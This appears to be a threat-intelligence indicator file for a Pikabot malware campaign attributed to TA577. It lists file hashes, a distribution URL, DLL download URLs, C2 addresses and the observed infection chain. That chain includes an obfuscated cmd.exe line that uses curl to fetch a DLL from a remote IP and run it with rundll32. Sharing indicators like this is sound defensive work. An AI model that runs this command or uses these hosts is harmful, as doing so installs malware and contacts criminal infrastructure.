-
Notifications
You must be signed in to change notification settings - Fork 1
/
Pikabot_23.10.2023.txt
76 lines (50 loc) · 2.18 KB
/
Pikabot_23.10.2023.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
23.10.2023 | Pikabot | TA577 | version: 1.1.15-ghost
*************************************************
.url https://pantiwilasa.app/teq/?1337
.zip cb685ba5b5e7bfe686839722d96ed6b9a13b95f61902d23f7b1e27632d569f9f
.dll 15e4de42f49ea4041e4063b991ddfc6523184310f03e645c17710b370ee75347
*************************************************
url > zip > js > curl > dll
wscript.exe C:\Users\Admin\AppData\Local\Temp\R812.js
cmd.exe" /c xrN || eCho xrN & pinG xrN || CuRL http://45.32.194.209/OpW40B/preju -o %TMP%\xrN.dll & pinG -n 4 xrN || RUndLl32 %TMp%\xrN.dll, Crash & exiT FOBKz=gjStdz
pinG xrN
pinG -n 4 xrN
RUndLl32 C:\Users\Admin\AppData\Local\Temp\xrN.dll, Crash
SearchProtocolHost.exe
whoami.exe /all
ipconfig.exe /all
netstat.exe -aon
rundll32.exe C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe
svchost.exe -k UnistackSvcGroup
*************************************************
distro url
https://pantiwilasa.app/teq/?1337
*************************************************
.dll distro
http://45.32.194.209/OpW40B/preju
http://64.176.214.231/RtJO/phlob
http://66.42.96.41/QIz/overs
http://144.202.90.10/AYp/opini
http://144.202.21.156/sYta1A/Litho
http://65.108.145.212/rVQw/ozono
http://65.108.81.144/Apqk1/Stere
http://95.216.153.152/YO3/navet
http://45.77.193.70/5nG/Hobbl
*************************************************
c2's
https://155.138.156.94:5243/angarepPlasmophagous/P1WaaD9XaxgjV9?theatronCingulectomy=Tagwerk&Bharti=Waxworker
https://154.221.30.136:13724/angarepPlasmophagous/P1WaaD9XaxgjV9?theatronCingulectomy=Tagwerk&Bharti=Waxworker
https://51.68.146.19:5242/angarepPlasmophagous/P1WaaD9XaxgjV9?theatronCingulectomy=Tagwerk&Bharti=Waxworker
https://154.92.19.139:2222/angarepPlasmophagous/P1WaaD9XaxgjV9?theatronCingulectomy=Tagwerk&Bharti=Waxworker
https://15.235.143.190:2224/angarepPlasmophagous/P1WaaD9XaxgjV9?theatronCingulectomy=Tagwerk&Bharti=Waxworker
15.235.143.190:2224
155.138.156.94:5243
51.68.146.19:5242
154.221.30.136:13724
154.92.19.139:2222
139.99.216.90:13720
156.251.137.134:5000
154.12.252.84:23399
85.215.218.128:5243
103.231.93.15:5631
196.218.123.202:13783